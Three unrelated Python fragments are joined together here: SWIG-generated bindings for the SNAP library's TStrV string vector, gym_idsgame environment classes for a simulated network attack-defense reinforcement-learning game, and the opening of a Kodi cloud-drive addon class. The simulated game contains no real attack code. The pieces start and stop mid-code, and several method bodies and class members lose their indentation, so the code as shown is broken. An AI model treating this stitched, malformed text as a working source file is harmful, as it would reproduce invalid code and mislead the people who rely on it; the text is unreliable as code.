return _snap.TStrV_Reverse(self, *args)
def Merge(self):
"""
Merge(TStrV self)
Parameters:
self: TVec< TStr,int > *
"""
return _snap.TStrV_Merge(self)
def Intrs(self, *args):
"""
Intrs(TStrV self, TStrV ValV)
Parameters:
ValV: TVec< TStr,int > const &
Intrs(TStrV self, TStrV ValV, TStrV DstValV)
Parameters:
ValV: TVec< TStr,int > const &
DstValV: TVec< TStr,int > &
"""
return _snap.TStrV_Intrs(self, *args)
def Union(self, *args):
"""
Union(TStrV self, TStrV ValV)
Parameters:
ValV: TVec< TStr,int > const &
Union(TStrV self, TStrV ValV, TStrV DstValV)
Parameters:
ValV: TVec< TStr,int > const &
DstValV: TVec< TStr,int > &
"""
return _snap.TStrV_Union(self, *args)
def Diff(self, *args):
"""
Diff(TStrV self, TStrV ValV)
Parameters:
ValV: TVec< TStr,int > const &
Diff(TStrV self, TStrV ValV, TStrV DstValV)
Parameters:
ValV: TVec< TStr,int > const &
DstValV: TVec< TStr,int > &
"""
return _snap.TStrV_Diff(self, *args)
def IntrsLen(self, *args):
"""
IntrsLen(TStrV self, TStrV ValV) -> int
Parameters:
ValV: TVec< TStr,int > const &
"""
return _snap.TStrV_IntrsLen(self, *args)
def UnionLen(self, *args):
"""
UnionLen(TStrV self, TStrV ValV) -> int
Parameters:
ValV: TVec< TStr,int > const &
"""
return _snap.TStrV_UnionLen(self, *args)
def Count(self, *args):
"""
Count(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
"""
return _snap.TStrV_Count(self, *args)
def SearchBin(self, *args):
"""
SearchBin(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
SearchBin(TStrV self, TStr Val, int & InsValN) -> int
Parameters:
Val: TStr const &
InsValN: int &
"""
return _snap.TStrV_SearchBin(self, *args)
def SearchForw(self, *args):
"""
SearchForw(TStrV self, TStr Val, int const & BValN=0) -> int
Parameters:
Val: TStr const &
BValN: int const &
SearchForw(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
"""
return _snap.TStrV_SearchForw(self, *args)
def SearchBack(self, *args):
"""
SearchBack(TStrV self, TStr Val) -> int
Parameters:
Val: TStr const &
"""
return _snap.TStrV_SearchBack(self, *args)
def SearchVForw(self, *args):
"""
SearchVForw(TStrV self, TStrV ValV, int const & BValN=0) -> int
Parameters:
ValV: TVec< TStr,int > const &
BValN: int const &
SearchVForw(TStrV self, TStrV ValV) -> int
Parameters:
ValV: TVec< TStr,int > const &
"""
return _snap.TStrV_SearchVForw(self, *args)
def IsIn(self, *args):
"""
IsIn(TStrV self, TStr Val) -> bool
Parameters:
Val: TStr const &
IsIn(TStrV self, TStr Val, int & ValN) -> bool
Parameters:
Val: TStr const &
ValN: int &
"""
return _snap.TStrV_IsIn(self, *args)
def IsInBin(self, *args):
"""
IsInBin(TStrV self, TStr Val) -> bool
Parameters:
Val: TStr const &
"""
return _snap.TStrV_IsInBin(self, *args)
def GetDat(self, *args):
"""
GetDat(TStrV self, TStr Val) -> TStr
Parameters:
Val: TStr const &
"""
return _snap.TStrV_GetDat(self, *args)
def GetAddDat(self, *args):
"""
GetAddDat(TStrV self, TStr Val) -> TStr
Parameters:
Val: TStr const &
"""
return _snap.TStrV_GetAddDat(self, *args)
def GetMxValN(self):
"""
GetMxValN(TStrV self) -> int
Parameters:
self: TVec< TStr,int > const *
"""
return _snap.TStrV_GetMxValN(self)
def GetV(*args):
"""
GetV(TStr Val1) -> TStrV
Parameters:
Val1: TStr const &
GetV(TStr Val1, TStr Val2) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6, TStr Val7) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
Val7: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6, TStr Val7, TStr Val8) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
Val7: TStr const &
Val8: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5, TStr Val6, TStr Val7, TStr Val8,
TStr Val9) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
Val5: TStr const &
Val6: TStr const &
Val7: TStr const &
Val8: TStr const &
Val9: TStr const &
"""
return _snap.TStrV_GetV(*args)
GetV = staticmethod(GetV)
# SWIG-generated registration: bind each C-level wrapper in _snap (named
# 'TStrV_<method>') onto the TStrV class as an instance method, then register
# the proxy class with the SWIG runtime.  Left byte-identical on purpose.
TStrV.Load = new_instancemethod(_snap.TStrV_Load,None,TStrV)
TStrV.Save = new_instancemethod(_snap.TStrV_Save,None,TStrV)
TStrV.LoadXml = new_instancemethod(_snap.TStrV_LoadXml,None,TStrV)
TStrV.SaveXml = new_instancemethod(_snap.TStrV_SaveXml,None,TStrV)
TStrV.__add__ = new_instancemethod(_snap.TStrV___add__,None,TStrV)
TStrV.__eq__ = new_instancemethod(_snap.TStrV___eq__,None,TStrV)
TStrV.__lt__ = new_instancemethod(_snap.TStrV___lt__,None,TStrV)
TStrV.GetMemUsed = new_instancemethod(_snap.TStrV_GetMemUsed,None,TStrV)
TStrV.GetMemSize = new_instancemethod(_snap.TStrV_GetMemSize,None,TStrV)
TStrV.GetPrimHashCd = new_instancemethod(_snap.TStrV_GetPrimHashCd,None,TStrV)
TStrV.GetSecHashCd = new_instancemethod(_snap.TStrV_GetSecHashCd,None,TStrV)
TStrV.Gen = new_instancemethod(_snap.TStrV_Gen,None,TStrV)
TStrV.GenExt = new_instancemethod(_snap.TStrV_GenExt,None,TStrV)
TStrV.IsExt = new_instancemethod(_snap.TStrV_IsExt,None,TStrV)
TStrV.Reserve = new_instancemethod(_snap.TStrV_Reserve,None,TStrV)
TStrV.Clr = new_instancemethod(_snap.TStrV_Clr,None,TStrV)
TStrV.Trunc = new_instancemethod(_snap.TStrV_Trunc,None,TStrV)
TStrV.Pack = new_instancemethod(_snap.TStrV_Pack,None,TStrV)
TStrV.MoveFrom = new_instancemethod(_snap.TStrV_MoveFrom,None,TStrV)
TStrV.Empty = new_instancemethod(_snap.TStrV_Empty,None,TStrV)
TStrV.Len = new_instancemethod(_snap.TStrV_Len,None,TStrV)
TStrV.Reserved = new_instancemethod(_snap.TStrV_Reserved,None,TStrV)
TStrV.Last = new_instancemethod(_snap.TStrV_Last,None,TStrV)
TStrV.LastValN = new_instancemethod(_snap.TStrV_LastValN,None,TStrV)
TStrV.LastLast = new_instancemethod(_snap.TStrV_LastLast,None,TStrV)
TStrV.BegI = new_instancemethod(_snap.TStrV_BegI,None,TStrV)
TStrV.EndI = new_instancemethod(_snap.TStrV_EndI,None,TStrV)
TStrV.GetI = new_instancemethod(_snap.TStrV_GetI,None,TStrV)
TStrV.AddV = new_instancemethod(_snap.TStrV_AddV,None,TStrV)
TStrV.AddSorted = new_instancemethod(_snap.TStrV_AddSorted,None,TStrV)
TStrV.AddBackSorted = new_instancemethod(_snap.TStrV_AddBackSorted,None,TStrV)
TStrV.AddVMerged = new_instancemethod(_snap.TStrV_AddVMerged,None,TStrV)
TStrV.AddUnique = new_instancemethod(_snap.TStrV_AddUnique,None,TStrV)
TStrV.GetVal = new_instancemethod(_snap.TStrV_GetVal,None,TStrV)
TStrV.GetSubValV = new_instancemethod(_snap.TStrV_GetSubValV,None,TStrV)
TStrV.Ins = new_instancemethod(_snap.TStrV_Ins,None,TStrV)
TStrV.Del = new_instancemethod(_snap.TStrV_Del,None,TStrV)
TStrV.DelLast = new_instancemethod(_snap.TStrV_DelLast,None,TStrV)
TStrV.DelIfIn = new_instancemethod(_snap.TStrV_DelIfIn,None,TStrV)
TStrV.DelAll = new_instancemethod(_snap.TStrV_DelAll,None,TStrV)
TStrV.PutAll = new_instancemethod(_snap.TStrV_PutAll,None,TStrV)
TStrV.Swap = new_instancemethod(_snap.TStrV_Swap,None,TStrV)
TStrV.NextPerm = new_instancemethod(_snap.TStrV_NextPerm,None,TStrV)
TStrV.PrevPerm = new_instancemethod(_snap.TStrV_PrevPerm,None,TStrV)
TStrV.GetPivotValN = new_instancemethod(_snap.TStrV_GetPivotValN,None,TStrV)
TStrV.BSort = new_instancemethod(_snap.TStrV_BSort,None,TStrV)
TStrV.ISort = new_instancemethod(_snap.TStrV_ISort,None,TStrV)
TStrV.Partition = new_instancemethod(_snap.TStrV_Partition,None,TStrV)
TStrV.QSort = new_instancemethod(_snap.TStrV_QSort,None,TStrV)
TStrV.Sort = new_instancemethod(_snap.TStrV_Sort,None,TStrV)
TStrV.IsSorted = new_instancemethod(_snap.TStrV_IsSorted,None,TStrV)
TStrV.Shuffle = new_instancemethod(_snap.TStrV_Shuffle,None,TStrV)
TStrV.Reverse = new_instancemethod(_snap.TStrV_Reverse,None,TStrV)
TStrV.Merge = new_instancemethod(_snap.TStrV_Merge,None,TStrV)
TStrV.Intrs = new_instancemethod(_snap.TStrV_Intrs,None,TStrV)
TStrV.Union = new_instancemethod(_snap.TStrV_Union,None,TStrV)
TStrV.Diff = new_instancemethod(_snap.TStrV_Diff,None,TStrV)
TStrV.IntrsLen = new_instancemethod(_snap.TStrV_IntrsLen,None,TStrV)
TStrV.UnionLen = new_instancemethod(_snap.TStrV_UnionLen,None,TStrV)
TStrV.Count = new_instancemethod(_snap.TStrV_Count,None,TStrV)
TStrV.SearchBin = new_instancemethod(_snap.TStrV_SearchBin,None,TStrV)
TStrV.SearchForw = new_instancemethod(_snap.TStrV_SearchForw,None,TStrV)
TStrV.SearchBack = new_instancemethod(_snap.TStrV_SearchBack,None,TStrV)
TStrV.SearchVForw = new_instancemethod(_snap.TStrV_SearchVForw,None,TStrV)
TStrV.IsIn = new_instancemethod(_snap.TStrV_IsIn,None,TStrV)
TStrV.IsInBin = new_instancemethod(_snap.TStrV_IsInBin,None,TStrV)
TStrV.GetDat = new_instancemethod(_snap.TStrV_GetDat,None,TStrV)
TStrV.GetAddDat = new_instancemethod(_snap.TStrV_GetAddDat,None,TStrV)
TStrV.GetMxValN = new_instancemethod(_snap.TStrV_GetMxValN,None,TStrV)
# Register the proxy class with the SWIG runtime type system.
TStrV_swigregister = _snap.TStrV_swigregister
TStrV_swigregister(TStrV)
def TStrV_SwapI(*args):
    """Swap the values referenced by two TStrV iterators (LVal, RVal)."""
    return _snap.TStrV_SwapI(*args)
def TStrV_GetV(*args):
"""
GetV(TStr Val1) -> TStrV
Parameters:
Val1: TStr const &
GetV(TStr Val1, TStr Val2) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
GetV(TStr Val1, TStr Val2, TStr Val3, TStr Val4, TStr Val5) -> TStrV
Parameters:
Val1: TStr const &
Val2: TStr const &
Val3: TStr const &
Val4: TStr const &
| |
is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=5)
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
attacker_agent = AttackMaximalValueBotAgent(game_config, self)
idsgame_config = IdsGameConfig(game_config=game_config, attacker_agent=attacker_agent)
idsgame_config.render_config.caption = "idsgame-maximal_attack-v4"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameV4Env(AttackDefenseEnv):
    """
    [AttackDefenseEnv] 4 layer, 5 servers per layer, 10 attack-defense-values
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards] Sparse
    [Version] 4
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=5)
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            idsgame_config = IdsGameConfig(game_config=cfg)
            idsgame_config.render_config.caption = "idsgame-v4"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
# -------- Version 5 ------------
class IdsGameRandomDefenseV5Env(AttackerEnv):
    """
    [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards] Sparse
    [Version] 5
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        from gym_idsgame.agents.bot_agents.random_defense_bot_agent import RandomDefenseBotAgent
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=2)
            cfg.network_config = NetworkConfig(cfg.num_rows, cfg.num_cols, connected_layers=True)
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            defender = RandomDefenseBotAgent(cfg)
            idsgame_config = IdsGameConfig(game_config=cfg, defender_agent=defender)
            idsgame_config.render_config.caption = "idsgame-random_defense-v5"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameMinimalDefenseV5Env(AttackerEnv):
    """
    [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
    defender following the "defend minimal strategy", connected layers
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards] Sparse
    [Version] 5
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        from gym_idsgame.agents.bot_agents.defend_minimal_value_bot_agent import DefendMinimalValueBotAgent
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=2)
            cfg.network_config = NetworkConfig(cfg.num_rows, cfg.num_cols, connected_layers=True)
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            defender = DefendMinimalValueBotAgent(cfg)
            idsgame_config = IdsGameConfig(game_config=cfg, defender_agent=defender)
            idsgame_config.render_config.caption = "idsgame-minimal_defense-v5"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameRandomAttackV5Env(DefenderEnv):
    """
    [DefenderEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards] Sparse
    [Version] 5
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        from gym_idsgame.agents.bot_agents.random_attack_bot_agent import RandomAttackBotAgent
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=2)
            cfg.network_config = NetworkConfig(cfg.num_rows, cfg.num_cols, connected_layers=True)
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            attacker = RandomAttackBotAgent(cfg, self)
            idsgame_config = IdsGameConfig(game_config=cfg, attacker_agent=attacker)
            idsgame_config.render_config.caption = "idsgame-random_attack-v5"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameMaximalAttackV5Env(DefenderEnv):
    """
    [DefenderEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
    attacker following the "attack maximal strategy", connected layers
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards] Sparse
    [Version] 5
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        from gym_idsgame.agents.bot_agents.attack_maximal_value_bot_agent import AttackMaximalValueBotAgent
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=2)
            cfg.network_config = NetworkConfig(cfg.num_rows, cfg.num_cols, connected_layers=True)
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            attacker = AttackMaximalValueBotAgent(cfg, self)
            idsgame_config = IdsGameConfig(game_config=cfg, attacker_agent=attacker)
            idsgame_config.render_config.caption = "idsgame-maximal_attack-v5"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameV5Env(AttackDefenseEnv):
    """
    [AttackDefenseEnv] 4 layer, 5 servers per layer, 10 attack-defense-values, connected layers
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards] Sparse
    [Version] 5
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=2)
            cfg.network_config = NetworkConfig(cfg.num_rows, cfg.num_cols, connected_layers=True)
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            idsgame_config = IdsGameConfig(game_config=cfg)
            idsgame_config.render_config.caption = "idsgame-v5"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
# -------- Version 6 ------------
class IdsGameRandomDefenseV6Env(AttackerEnv):
    """
    [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards]: Dense
    [Version] 6
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        from gym_idsgame.agents.bot_agents.random_defense_bot_agent import RandomDefenseBotAgent
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=2)
            cfg.network_config = NetworkConfig(cfg.num_rows, cfg.num_cols, connected_layers=True)
            # v6 differs from v5 by using dense rewards.
            cfg.dense_rewards = True
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            defender = RandomDefenseBotAgent(cfg)
            idsgame_config = IdsGameConfig(game_config=cfg, defender_agent=defender)
            idsgame_config.render_config.caption = "idsgame-random_defense-v6"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameMinimalDefenseV6Env(AttackerEnv):
    """
    [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
    defender following the "defend minimal strategy", connected layers
    [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
    [Rewards]: Dense
    [Version] 6
    [Observations] partially observed
    [Environment] Deterministic
    [Attacker Starting Position] Start node
    [Reconnaissance activities] disabled
    [Reconnaissance bool features] No
    """
    def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
        """
        Creates the environment.

        :param idsgame_config: environment configuration; a default one is built when None
        :param save_dir: directory where outputs of the env are saved
        :param initial_state_path: optional path to a saved initial state
        """
        from gym_idsgame.agents.bot_agents.defend_minimal_value_bot_agent import DefendMinimalValueBotAgent
        if idsgame_config is None:
            cfg = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
            cfg.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
                                  vulnerability_val=0, num_vulnerabilities_per_layer=2)
            cfg.network_config = NetworkConfig(cfg.num_rows, cfg.num_cols, connected_layers=True)
            # v6 differs from v5 by using dense rewards.
            cfg.dense_rewards = True
            if initial_state_path is not None:
                cfg.set_load_initial_state(initial_state_path)
            defender = DefendMinimalValueBotAgent(cfg)
            idsgame_config = IdsGameConfig(game_config=cfg, defender_agent=defender)
            idsgame_config.render_config.caption = "idsgame-minimal_defense-v6"
        super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameRandomAttackV6Env(DefenderEnv):
"""
[DefenderEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Dense
[Version] 6
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param | |
#-------------------------------------------------------------------------------
# Copyright (C) 2017 <NAME> (cguZZman) <EMAIL>
#
# This file is part of Cloud Drive Common Module for Kodi
#
# Cloud Drive Common Module for Kodi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Cloud Drive Common Module for Kodi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#-------------------------------------------------------------------------------
import inspect
import os
import sys
import threading
import time
import urllib
from urllib2 import HTTPError, URLError
import urlparse
from clouddrive.common.account import AccountManager, AccountNotFoundException, \
DriveNotFoundException
from clouddrive.common.cache.cache import Cache
from clouddrive.common.exception import UIException, ExceptionUtils, RequestException
from clouddrive.common.export import ExportManager
from clouddrive.common.remote.errorreport import ErrorReport
from clouddrive.common.remote.request import Request
from clouddrive.common.service.download import DownloadServiceUtil
from clouddrive.common.service.rpc import RemoteProcessCallable
from clouddrive.common.ui.dialog import DialogProgress, DialogProgressBG, \
QRDialogProgress, ExportMainDialog
from clouddrive.common.ui.logger import Logger
from clouddrive.common.ui.utils import KodiUtils
from clouddrive.common.utils import Utils
import xbmcgui
import xbmcplugin
import xbmcvfs
from datetime import timedelta, datetime
class CloudDriveAddon(RemoteProcessCallable):
    """Base class for cloud-drive Kodi addons.

    Concrete addons subclass this and implement get_provider(); this class
    supplies the shared plugin plumbing: account/drive listing, sign-in,
    folder browsing and export management. Class attributes below are
    defaults; most are re-assigned per instance in __init__.
    """
    # Seconds the sign-in PIN dialog waits before giving up.
    _DEFAULT_SIGNIN_TIMEOUT = 120
    # Addon identity and invocation state (filled in __init__ from sys.argv).
    _addon = None
    _addon_handle = None
    _addonid = None
    _addon_name = None
    _addon_params = None
    _addon_url = None
    _addon_version = None
    _common_addon = None
    _cancel_operation = False
    _content_type = None
    _dialog = None
    # Export bookkeeping (progress counters for the export run).
    _exporting = None
    _export_manager = None
    _exporting_target = 0
    _exporting_percent = 0
    _exporting_count = 0
    _child_count_supported = True
    _auto_refreshed_slideshow_supported = True
    _load_target = 0
    _load_count = 0
    _profile_path = None
    # Dialogs created in __init__; referenced throughout the UI flows.
    _progress_dialog = None
    _progress_dialog_bg = None
    _export_progress_dialog_bg = None
    _system_monitor = None
    # Supported media extensions as reported by Kodi ('' and 'zip' excluded for video).
    _video_file_extensions = [x for x in KodiUtils.get_supported_media("video") if x not in ('','zip')]
    _audio_file_extensions = KodiUtils.get_supported_media("music")
    _image_file_extensions = KodiUtils.get_supported_media("picture")
    _account_manager = None
    _action = None
    # Public IP captured before the PIN flow; used to derive the source id shown to the user.
    _ip_before_pin = None
def __init__(self):
    """Initialize addon state from Kodi and, when invoked as a plugin, parse sys.argv."""
    self._addon = KodiUtils.get_addon()
    self._addonid = self._addon.getAddonInfo('id')
    self._addon_name = self._addon.getAddonInfo('name')
    self._addon_url = sys.argv[0]
    self._addon_version = self._addon.getAddonInfo('version')
    self._common_addon_id = 'script.module.clouddrive.common'
    self._common_addon = KodiUtils.get_addon(self._common_addon_id)
    self._common_addon_version = self._common_addon.getAddonInfo('version')
    self._dialog = xbmcgui.Dialog()
    self._profile_path = Utils.unicode(KodiUtils.translate_path(self._addon.getAddonInfo('profile')))
    self._progress_dialog = DialogProgress(self._addon_name)
    self._progress_dialog_bg = DialogProgressBG(self._addon_name)
    self._export_progress_dialog_bg = DialogProgressBG(self._addon_name)
    self._system_monitor = KodiUtils.get_system_monitor()
    self._account_manager = AccountManager(self._profile_path)
    self._pin_dialog = None
    self.iskrypton = KodiUtils.get_home_property('iskrypton') == 'true'
    # When launched as a plugin, sys.argv is [base_url, handle, query_string].
    if len(sys.argv) > 1:
        self._addon_handle = int(sys.argv[1])
        # Strip the leading '?' and flatten each parse_qs list to its first value.
        self._addon_params = urlparse.parse_qs(sys.argv[2][1:])
        for param in self._addon_params:
            self._addon_params[param] = self._addon_params.get(param)[0]
        self._content_type = Utils.get_safe_value(self._addon_params, 'content_type')
        if not self._content_type:
            # No explicit content_type: infer it from the current Kodi window id
            # (presumably music windows -> audio, pictures -> image; TODO confirm ids).
            wid = xbmcgui.getCurrentWindowId()
            if wid == 10005 or wid == 10500 or wid == 10501 or wid == 10502:
                self._content_type = 'audio'
            elif wid == 10002:
                self._content_type = 'image'
            else:
                self._content_type = 'video'
        # Advertise the sort methods the listings support.
        xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_LABEL)
        xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_UNSORTED )
        xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_SIZE )
        xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_DATE )
        xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_DURATION )
def __del__(self):
    """Drop references to the helper objects created in __init__ on teardown."""
    for helper in ('_addon', '_common_addon', '_dialog', '_progress_dialog',
